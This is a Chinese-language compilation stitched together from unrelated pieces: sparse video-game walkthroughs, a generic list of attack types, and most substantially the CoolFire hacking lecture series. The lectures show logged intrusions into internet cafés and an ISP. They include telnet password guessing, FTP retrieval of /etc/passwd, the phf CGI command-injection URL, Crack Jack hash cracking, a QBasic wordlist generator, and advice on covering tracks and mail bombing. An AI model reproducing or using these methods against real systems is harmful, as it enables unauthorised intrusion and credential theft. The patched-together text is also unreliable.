



尤里的复仇攻略1. 引言《尤里的复仇》是一款以战争为背景的即时战略游戏,在这个游戏中,玩家将扮演尤里一方的指挥官,带领自己的军队进行战斗,实施复仇计划。


2. 游戏背景在游戏中,尤里是一位雄心勃勃的军事指挥官,曾经是盟军的一员,在某次任务中遭到军方的背叛,被剥夺了指挥权,为此他决定以复仇为驱动,建立自己的势力,推翻军方的统治。

3. 游戏基本操作在游戏中,玩家可以使用键盘和鼠标进行操作。




4. 游戏策略在《尤里的复仇》中,玩家需要制定一些策略来战胜敌人并完成任务。

以下是一些游戏策略的建议:4.1 兵种搭配不同的兵种拥有不同的属性和技能,正确的兵种搭配可以让你的部队更强大。


4.2 采取合理的防守措施在游戏中,敌人可能会对你的基地进行进攻,因此你需要采取一些合理的防守措施来保护自己的基地。


4.3 发展经济良好的经济发展是游戏胜利的基础。


4.4 利用地形地形在战斗中起着重要作用,你可以利用山脉、河流等地形阻挡敌军的进攻,也可以利用地形进行伏击或埋设炸弹。

5. 游戏中的任务在游戏中,玩家需要完成一系列的任务来推动剧情的发展。




6. 结论《尤里的复仇》是一款充满策略性和挑战性的即时战略游戏。






















合金装备1攻略F2 无敌模式F4 弹药无限F5 普通视角F6 观察视角F7 快速重启关卡F8,F9,F11,F12 贴图模式开关隐藏秘密A.通关后1. 得到STEALTH隐形迷彩: 最后时救出博士(被拷问时按SELECT放弃)。

2. 得到BANDANA无限弹药: 最后时救出Meryl(被拷问时硬扛——连按'Action')。

3. 得到CAMERA照相机: 通关前取得照相机。

4. 若第一及第二次分別救Meryl及Otakon博士,第三次遇到忍者时……(他换衣服了)5. 在分別救Meryl及Otakon博士后,第三次翻版时ENDING会是新的MUSIC!(动感十足)。

6. 获得最高评价BIG BOSS(大老板?):在不使用雷达的情况下被发现次数小于4、杀敌数25人以下、压缩饼干使用小于1、在3小时之内翻版、不能接关!心语:这才是007类的SPY!7. 翻版后看特别模式,增加了一个主观模式。

心语:难控制 :( 连按'三角'2次进入主观模式,之后连按'三角'2次退出。

附:捡东西时一定要趴下!8. 不是心得的心得: 翻版后敌人的位置会改变.B.一些细节1. 在和WOLF狙击手对决的通道里,连续射杀水管上的老鼠会有漂亮的MM骂你!内容自己看吧!!若连续杀死2只乌鸦,Roy Campbell会CALL你!!!2. 闹剧:在卡车上躲在箱子里,忍几秒!你会被运到箱子上所写的地址3. 在医务室被关时, 当逃走后不要打死那个士兵, 让他跟着你到电刑室. 他会因为'肚子问题'上厕所,这时你去敲厕所门,看看他的反应4. 在接受Revolver Ocelot的拷问时忍耐5次,等待忍者来搭救,逃出牢房後所有武器弹药全满!5. 装备STEALTH隐形迷彩拖着敌人可以进入要CARD KEY的房间.6. 神秘电台: 140.07---制作人员的密语. 140.66---在峡谷、连接通道、雪原拨通,可以听到怪声!!!! 141.52---武器专家.7. 金刚不坏之身:当然不是说你! 是一只狼!在玩DISC 2后回到之前埋葬狙击手的地方.那里有只小狼,它是不死之身!有兴趣拿它练练枪法!好象狼窝里也有一只!?8. 若是连续3次呼叫美铃并且不存档,她会生气大骂,第4次她的表情会因生气而表情及态度有所变化。






一、黑客技能1. 黑客视野(Hacker Vision):这是一项基础黑客技能,在游戏一开始就可以解锁。



2. 远程控制(Remote Control):远程控制是游戏中最重要的黑客技能之一。



3. 黑客工具(Hacking Tools):除了基本的黑客技能外,玩家还可以使用各种黑客工具来辅助游戏进行。



二、任务解决攻略1. 数据泄漏任务:在这个任务中,玩家需要入侵某个组织的服务器,获取重要的机密文件。




2. 交通混乱任务:这个任务要求玩家通过黑客技能来制造交通混乱,帮助盟友逃离追击。




3. 黑客大赛任务:这个任务是游戏中的一项重要挑战,需要玩家在限定时间内完成一系列黑客挑战。







1. 任务准备阶段。




2. 入侵目标系统。




3. 获取管理员权限。




4. 完成任务目标。




5. 清理痕迹。


































密室逃脱--黑客 完美攻略

密室逃脱--黑客 完美攻略









密码一:“0x”--**场景二和场景四墙壁上海报中的一系列数字得“0xBAD”,利用场景二中桌子左边架子下边的纸团中的六进制算法的密码为B(11)x 16^2+A(10) x 16^1+ D(13) x 16^0=“2989”密码二:三顶帽子--**场景一,场景三,场景四中对应帽子上的数字即为密码“267”密码三:松树林--**场景三将优盘插如笔记本电脑,点击放大到电脑屏幕页面,屏幕中点击荧光棒得到密码“1827”主机外拿到钥匙快开门逃吧!>-<。






1. 信息收集:红客在进行攻击前首先需要对目标进行信息收集。




2. 漏洞扫描:在信息收集的基础上,红客会对目标系统进行漏洞扫描。



3. 钓鱼攻击:钓鱼攻击是指通过虚假的信息诱骗用户点击恶意链接或下载恶意文件,从而获取用户的账号密码或者控制用户的计算机。



4. 远程攻击:远程攻击是指通过网络远程控制目标系统或者执行恶意代码。



5. 社会工程:社会工程是指通过欺骗和操纵人们的心理,获取系统的访问权限或者敏感信息。



6. 拒绝服务攻击:拒绝服务攻击是指通过发送大量请求,占用系统资源或者使系统崩溃,从而使系统无法正常服务。





CoolFire系列讲座第1讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!#1 甚么是Hacking ?就是入侵电脑! 有甚么好解释的! 大部份有关介绍Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最好不要成为一个"骇客", 我... 不是!#2 为甚么要Hack ?我们只是为了要解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作!! 为了安全性而作革命!#3 Hack 守则1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料!!2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状.3. 不要轻易的将你要Hack 的站台告诉你不信任的朋友.4. 不要在bbs 上谈论你Hack 的任何事情.5. 在Post 文章的时候不要使用真名.6. 正在入侵的时候, 不要随意离开你的电脑.7. 不要侵入或破坏政府机关的主机.8. 不在电话中谈论你Hack 的任何事情.9. 将你的笔记放在安全的地方.10. 想要成为Hacker 就要真正的Hacking, 读遍所有有关系统安全或系统漏洞的文件(英文快点学好)!11. 已侵入电脑中的帐号不得清除或修改.12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开!!13. 不将你已破解的帐号分享与你的朋友.#4 破解之道1. 进入主机中2. 得到/etc/passwd3. 得到系统帐号4. 得到最高权限-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 1.进入主机有好几种方式, 可以经由Telnet (Port 23) 或SendMail (Port 25)或FTP 或WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多项服务, 所以如果你只是要"进入" 该主机, 这些Port 都是很好的进行方向. 当然还有很多Port, 但是DayTime 的Port 你能拿它作甚么??? 我不知道, 你知道吗?!底下的示范并不是像写出来的那么容易, 只不过是要让你解如何进入, 当然其中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了面子.... 一定要删掉这些不堪入目的东西嘛...示范进入主机的方法: (By CoolFire)(首先要先连上某一台你已经有帐号的Telnet 主机, 当然最好是假的, 也就是Crack过的主机, 然後利用它来Crack 别的主机, 才不会被别人以逆流法查出你的所在)Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from我用的是 ... 当然是假的罗, 都已经经过修改了啦!!没有这一台主机啦!! 别怕! 别怕! 以下的主机名称都是假的名称, 请同学们要记得!!)Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是......)> telnet (Telnet 试试看....)Trying to .Escape character is '^]'.Password:Login incorrect(没关系, 再来!!)cool login: hinetPassword:Login incorrectcool login:(都没猜对, 这边用的是猜的方法, 今天运气好像不好)telnet> closeConnection closed.(重来, 换个Port 试试看!!)> telnet 80Trying to character is '^]'.<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>Error 400</H1>Invalid request "" (unknown method)<P><HR><ADDRESS><A HREF="">CERN-HTTPD 3.0A</A></ADDRESS></BODY></HTML>Connection closed by foreign host.(哇哩!! 连密码都没得输入, 真是..... 再来!! 要有恒心!!)(换FTP Port 试试)> ftp to cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name ( anonymous331 Guest login ok, send your complete e-mail address as password.Password:230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@230-If you do have problems, please try using a dash (-) as the first character230-of your password -- this will turn off the continuation messages that may230-be confusing your ftp client.230-230 Guest login ok, access restrictions apply.Remote system type is UNIX.Using binary mode to transfer files.(哇! 可以用anonymous 进来耶!! password 部份输入aaa@ 就好了! 不要留下足迹喔!!)ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.etcpubusrbinlibincomingwelcome.msg226 Transfer complete.(嗯嗯... 太好了! 进来了!! 下一个目标是.....)ftp> cd etc250 CWD command successful.ftp> get passwd (抓回来!!)200 PORT command successful.150 Opening BINARY mode data connection for passwd (566 bytes).226 Transfer complete.566 bytes received in 0.56 seconds (0.93 Kbytes/s)(喔... 这么容易吗??)ftp> !cat passwd (看看!!!)root::0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashftp:*:404:1::/home/ftp:/bin/bash(哇哩... 是Shadow 的... 真是出师不利.... )ftp> bye221 Goodbye.(不信邪.... 还是老话, 要有恒心....)(FTP 不行, 再Telnet 看看!!)> telnet Trying to .Escape character is '^]'.Password:Login incorrect(又猜错!!)cool login: fuckyouPassword:Last login: Mon Dec 2 09:20:07 from 1.2.13.Some programming languages manage to absorb change but withstand progress.cool:~$(哇哈哈!! 哪个笨root, 用system name 作username 连password 也是system name.... 总算... 没白玩...)cool:~$ systembash: system: command not found(嗯... 这个user 的权限好像不大....)cool:~$ lscool:~$ pwd/home/fuckyoucool:~$ cd /cool:/$ lsPublic/ cdrom/ lib/ mnt/ tmp/ www/README dev/ linux* proc/ usr/bin/ etc/ local/ root/ var/boot/ home/ lost+found/ sbin/cool:/$ cd etctelnet> quit(好想睡呀!! 不玩了!! 下节课再开始....)Connection closed.> exit(走了!! 下节课在见啦!! 今天就上到这里! 老师要先下班了!!)(有学生说: 骗人! 还没有破解呀!! 胡说! 不是已经进来了吗???看看这节课上的是甚么??? ---->进入主机!! 嗯.....)-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 2.上节课抓回来一个"乱七八糟" 的/etc/passwd, 你以为我的真那么笨吗?? guest 所抓回来的能是甚么好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已经"猜" 到了一个不是guest 的username 及password. 今天就以它来进入主机瞧瞧!!Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是.....呵...)> telnet (Telnet 试试看.... 昨天的位址, 有作笔记吧!)> telnet Trying to .Escape character is '^]'.Password:Login incorrectcool login: fuckyouPassword: (一样输入fuckyou)Last login: Mon Dec 1 12:44:10 from Linux 1.2.13.cool:~$ cd /etccool:/etc$ lsDIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpc NETWORKING group mail.rc securetty NNTP_INEWS_DOMAIN host.conf motd sendmail.cfX11@ hosts messages/ sendmail.stXF86Config hosts.allow mtab servicesat.deny hosts.deny mtools shells bootptab hosts.equiv named.boot shutdownp csh.cshrc hosts.lpd networks snoopy/ csh.login httpd.conf nntpserver slip.hosts exports inetd.conf passwd snooptab fastboot inittab passwd.OLD syslog.conf fdprm issue passwd.old syslog.pid fstab ld.so.cache printcap ttys ftpaccess ld.so.conf profile utmp@(找寻目标..... 太乱了! 懒得找, 再来....)cool:/etc$ ls pa*passwd passwd.OLD passwd.old(果然在)cool:/etc$ more passwd(看看有没有Shadow...)root:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(正点! 一点都没有防备!!)cool:/etc$ exitlogout(走了!.... 换FTP 上场!!)Connection closed by foreign host.> ftp Connected to .220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (:66126): fuckyou331 Password required for fuckyou.Password:230 User fuckyou logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd /etc250 CWD command successful.ftp> get passwd200 PORT command successful.150 Opening BINARY mode data connection for passwd (350 bytes).226 Transfer complete.350 bytes received in 0.68 seconds (1.9 Kbytes/s)ftp> !cat passwdroot:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(看看! 呵! 假不了!!......)ftp> bye221 Goodbye.> exit(闪人罗!! 下课!!.... 喔慢点, 还有事要说明......)passwd 的Shadow 就是把passwd 放在shadow 档中, 而你原先在第一节课所看到的这个格式的passwd 并不是真正的passwd....root::0:0:root:/root:/bin/bash因为密码的部份没有东西.... 所以拿了也没有用!! 但这一节课所拿到的东西呢, 像是这样, 有几点需要说明的, 就是它究竟代表著甚么???john:234ab56:9999:13:John Smith:/home/john:/bin/sh它以":" 分成几个栏位, 各栏位对照如下:User Name: johnPassword:234ab56User No: 9999Group No: 13Real Name: John SmithHome Dir: /home/johnShell: /bin/sh了吧! 了吧! 保留著你千辛万苦所拿到的passwd, 咱们第三节课再来告诉各位如何使用Crack Jack 把passwd 解码.... 呵呵... zzZZzZzz...-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-Crack Jack V1.4 中文使用说明(By CoolFire 12-1-1996)嗯... 该到第三课了!! 累了的同学先去喝口水吧!这一节课咱们来说说Crack Jack ! 这可是个解读/etc/passwd 的好工具喔, 不要告诉我你习惯用Brute, 拿Brute 跟Crack Jack 的速度比比看, 包准你马上投向Crack Jack 1.4 的怀抱, 但请先确定你所使用的是Crack Jack 1.4, 你可以在CoolFire 的Hacker&Mailer Page 中拿到这个版本的Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上! 但还是要讲讲它的缺点... 就是只能在DOS 跟OS2 中跑, 如果在Windoz 95 上开个DOS Mode 跑, 它可是连理都不会理你的!OK! 现在切入正题! etc/passwd 拿到手了吧!! 开始罗!! 使用Crack Jack 1.4 前所需要的东西有这些[1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在Unix 系统中的/etc/ 目录中找到passwd [3] 字典档(哪里找, 自己敲... 呵ClayMore 中有一份DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用Crack Jack 1.4 前需先确定你所使用的机器是386 含以上CPU 的! 然後最好有充足的记忆体!!开始Jack 时只要敲入JACK 即可, 它会问你PW Name... 输入你的passwd 档名, DictionaryName 输入你的字典档名, Jack 就会开始找了! 找到时会告诉你, 也会在JACK.POT 中写入它所找到的密码!! 但... 有点怪的格式! 如果找到的是具root 权限的密码, Jack 会告诉你This isJackAss... 嗯...说脏话了!! 因为使用Jack 占用的时间实在太多, 如果你中途想要停掉时只要按下Ctrl-C 即可, 别以为你前功尽弃了! 因为Jack 有个Restore 的功能, 中断时会自动存档为RESTORE, 下次要继续这次的寻找只要输入Jack -Restore:RESTORE 即可!! 当然你也可以为你的Restore 重新命名! Jack 也会找得到的... 如Ren restore restore.HNT 之後要再寻找的时後就Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的Restore 前次所寻找的字串...继续帮你找下去....字典档哪里找: 我的不给你! 可以找别的Brute Force 之类的程式, 有些里面会附, 或是找找其它的Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有一点资料栏位及写程式的基础.[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的root 权限密码! Jack 好正点呀!!!所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧!!继续CoolFire系列讲座第2讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!话说上次CoolFire 讲到许多的Net Coffee 店, 安全性之差实在是没话说,但是过了这麽久也不见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像CoolFire这样温和, 如果遇到的是比较狠一点的角色, 那你的Net Coffee 可能要有一两天只卖Coffee 而没办法再Net 下去了!!继CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢?? 这次咱们不谈新的花招,用用之前所讲的再来探险一番, 当然, 这一次我照往例还是不会使用真正的Domain Name 来作教学,但是课程中的所有内容绝对属实, 当然本次攻击的对象还是.... Net Coffee Shop....**谈一下Crack Jack 猜猜密码许多人从上一次介绍Crack Jack 之後就应该已经领教过它的功力了,但是有几点需要说明的,有些人使用Jack 来帮你寻找password, 我就当你已经抓到了没有shadow 的/etc/passwd,但是为甚麽使用Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为Jack 还是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字,那当然连一个小小帐号的密码你都别想猜到了. 数一下你所使用的字典档中有多少字???我用的字典档有十九万多个字, 你的呢? 是不是小巫见大巫呀?? 那麽就赶快充实一下字典档再重新寻找吧!!许多人的密码都有一定的法则, 我自己写了PaSs2DiC 就是将UserName 由passwd档转成字典档的工具, 这是对一些喜欢使用UserName 当作Password 的人最好的方式,但是也曾经好运的找到别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的ID 作为密码的???你可以很简单的使用Qbasic 来制作"序数" 密码, 或日期密码, 底下简单的作一个0101 (一月一日) 到1231 的密码档出来:------------Cut Here MakeDate.BAS -------------------Open "Dates" for output as #1for I=1 to 12for J=1 to 31I1$=rtrim$(ltrim$str$(I)))J1$=rtrim$(ltrim$str$(J)))if len(I1$)=1 then I1$="0"+I1$if len(J1$)=1 then J1$="0"+J1$Out$=I1$Content$J1$print #1,Out$next Inext Jclose------------ Cut Here End MakeDate.BAS ----------------这支小程式将会写一个"DATES" 的档案, 里面就是你要的字典, 当然啦,这只是包含月跟日!!如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再Run 一次试试看了,不过这是一个好的开始不是吗??**如何保护自己的密码谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解,请遵守以下的原则: [1]不用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大) [3]不用身份证字号作为密码(LetMeIn! 里有猜身份证字号的功能耶)[4]不用在字典中查得到的字作为密码.那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:用一句有意义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型, 基於这个密码猜法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调?? 如果你的密码是coolfire,建议你最好能改成CoolFire 或coolfires (加复数"s"),这样被猜中的机率就小了很多. 如果你是一个Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@**正式的话题这次的话题当然还是Crack, 相信许多人已经看过CoolHC#1 了,当然眼尖的人可能也已经D/LSystem Holes 试过了, 你有成功的例子吗?? 如果没有, 这份CoolHC#2可能就是你的强心针,因为这次谈的正是System Holes #1 成功的案例.Step 1. 连线到"蕃薯藤" 找"网路咖啡" 找到好多家网路咖啡的WWW 网址, 一一连上去试试看在System Holes #1 中的方法可不可行.Step 2. 若可行则会传回/etc/passwd 资讯, 存档後迅速Logout, 使用Crack Jack解读!![[实例探讨]]System Holes #1 中所介绍的WWW 入侵法是这样子的:/cgi-bin/nph-test-cgi?* 後再/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd[1] 用WWW Browser 连到[2] Location 输入--> "/cgi-bin/nph-test-cgi?*"[3] 接著如果出来一份像Report 的画面的话, 接著输入/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd[4] 发生了甚麽事?? etc/passwd 在你的浏览器中"显示" 出来了!! 快点Save 吧!!这个方法所用的是系统"检索" 的漏洞, 不提供这个功能,或是伺服器检索类型不同的机器则不会接受这样的指令, 当然也就逃过我们这次的模拟演练啦!! 但是.... 相信我,你一定会找到一家脱线的网路咖啡, 并没有像我们一样每天阅读Mail List 的信,对系统安全一点研究也没有的人不在少数. 就是这样的一个Net Coffee Shop... 呵.... 快来试试吧!!当CoolFire 抓到/etc/passwd 後, 立刻存档, 也马上断线, 并且拿出UltraEdit 来瞧一下使用者的资讯, 当然这个小passwd 对Crack Jack 来说, 实在是不够看,没几分钟就在我的486 机器上显示出来几个以UserName 作为Password 的资讯(归功於PaSs2DiC 及CrackJack 的功劳)不过当我试著找寻root 的密码时, 一想到我那将近20 万字的字典档,就想到可能花费的时间一定相当的惊人, 於是就以Jack 的Option 设定只寻找root 那一行, ...(过了良久)... 果不然又是一个笨root. 用了"非常" 容易猜的密码... <--- This is JackAss... 呵!! GotIt!如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用Crack Jack,不然你也可以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是486DX4-13032MB RAM, 3.2GB HDD, 近20 万字的字典档, 如果在分析较大的passwd档时我会将字典档切割为四至五个小档(看有多少台机器可跑),然後在周末下班前在公司的几台机器上分别执行CrackJack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd 档又很大的话,由於Crack Jack 无法於Windoz 95 下使用, 你可能只能牺升时间或机器来跑了! 再没有办法的话, 亦可使用单机多工, 多开几个DOS Box 来跑Brute, 也许也是一个可行的办法!**後语有许多人在使用Crack Jack 的时候有许多问题, 不过看了CoolHC#1 应该都解决了吧?? 最近大家问的比较多的是UpYours 3.0, 虽然已经改进了Install 的问题,不过大家的问题还是都出在Winsck.ocx 上面, 有人说装了MSICP Beta 会好?? 但也有实例装了也还不能Run 的,在此建议大家不要再玩MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,已经证实有许多常用的MailBomb 没有办法Fake IP 了!! 所以... 如果UpYours 3.0装不起来的人就试试KaBoom!V3.0 吧! 虽然没有办法Fake IP (选错Mail Server 的话), 但是也是一个不错的AnonyMailer如果要发匿名信, 现在首页上有可以帮你发信的Mailer, 会安全一点.如果你仍旧对UpYours 3.0 不死心, 就试试ResSvr32.exe (Under Windows/systemdirectory),看看能不能将WinSck.ocx 装上了... 记得先UnReg 再Reg...在此建议大家可以多订阅一些"系统安全" 讨论的Mail List或多参考一些已经被找出来的系统漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,如果能够多参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,放在手边参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是SendMail 的Bug 实例,在这中间当然照往例会先出一份System Holes #2 来作为资料. 如果有兴趣的人在SH#2 出来的时候可以先研究看看. 下次见! Merry X'Mas..... & Happy New Year.......------上次讲的Home Page 建置案还没搞完, 没有充实一下Home Page 实在是对不起大家,所以利用一点时间写了CoolHC#2, 可能报告又交不出来了!! 老话,如果你有兴趣写其它程式的中文说明, 请完成後寄一份给我, 我将它放在Home Page 上面让其它人参考,当然你也可以给我你的使用心得, 让别人参考看看也行! 目前准备收集一系列的System Hole List,如果你在其它的站台有看到的, 请把它先Cut 下来, Mail 一份给我!------再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上(又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它Shut Down.... 好了! 别太暴力了!CoolFire系列讲座第3讲:如何连接ISP并且对其解码作者:CoolFire [coolfires@] (2001-10-13 08:05:00) CoolHC Volume 3 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!前几次说到了Net Coffee 店, 还好他们没有提供客户拨接上线的功能, 不然密码或是帐号被人盗用的客户不就糗大了! 但是CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的W3 密码,误入一个号称第一个提供网路拨接的ISP, 且在CoolFire 顺利的抓回/etc/passwd 之後, 使用了自己写的PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了9 组ID 与Password 相同的密码,勿怪我没有在这里提醒大家, 还好我没有找到root password, 不然可能该系统就此停摆, 不可再见天日也! (当然我不可能这么作啦!).看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上CoolFire 最近开会的时候遇到的情况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强, 可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃! 大家要小心呀!ISP 是一般User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导User 正确的网路使用观念(Password 的设定及proxy 的使用等), 实在不敢想像这样的网路发展到几年後会是甚么样子??这一次的说明还是没有谈到新的技巧, 在James 将首页更新後各位应该已经可以从中学到许多东西了, 如果想要学习入侵, 就一定要知道最新的资讯(入侵本国的网路则不用, 反正没人重视网路安全..... 真失望), 在别人还没将Bug 修正之前就抢先一步拿到/etc/passwd, 所以订阅一些网路安全的Mail List 是必要的, 多看一些网安有关的News Group 也是必要的(不仅Hacker 如此, ISP 更要多注意这些资讯!). 日後有空再整里一些Mail List 给大家!!本次主题: 说明如何连接该ISP 并且对其/etc/passwd 解码连接位址: (特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以CoolFire 已经Mail 给该网页之维护人员更改密码, 但该网页之ISP 仍为新手之练习好题材! CoolFire Mail 给该网页维护人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!Mail sent to dhacme@:Subject: 请速更动网页密码From: CoolFire <coolfires@>你的网页作得不错, 但是因为你所设定的密码太容易为骇客所? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次若网页遭到篡改, 本人概不负责!!**** 课程开始****请注意: 由於本次所作的课程内容以实作为主, 除了本人IP 有所更改, 一切都使用本人所用之Telnet 软体Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容, 否则本人概不负责!(连线到某一主机之後.... 此处的.tw 是假的Domain name).tw> telnet Trying to .Escape character is '^]'.Password: (随便按一下Enter)Login incorrectwww login: coffee (以Hacker 的敏锐判断username=coffee password=coffee)Password:Last login: Thu Jan 9 10:41:52 from .tw欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!================================================================= (直接进入核心部份)www:~$ cd /etcwww:/etc$ lsDIR_COLORS hosts.equiv printcapHOSTNAME hosts.lpd profile NETWORKING inet@ protocolsNNTP_INEWS_DOMAIN inetd.conf psdevtabX11@ inittab rc.d/at.deny inittab.gettyps.sample resolv.confbootptab ioctl.save rpccsh.cshrc issue securettycsh.login securetty.olddefault/ klogd.pid sendmail.cfdiphosts ld.so.cache sendmail.stexports ld.so.conf servicesfastboot lilo/ shellsfdprm lilo.conf shutdownpidfs/ localtime skel/fstab magic slip.hostsftp.banner mail.rc slip.loginftp.deny motd snooptabftpaccess motd.bak sudoersftpconversions msgs/ syslog.confftpgroups mtab syslog.pidftpusers mtools termcapgateways named.boot ttysgettydefs networks utmp@group nntpserver vga/host.conf passwd wtmp@hosts passwd.OLD yp.conf.example hosts.allow passwd.oldhosts.deny ppp/(看看我们的目标长得如何???)www:/etc$ cat 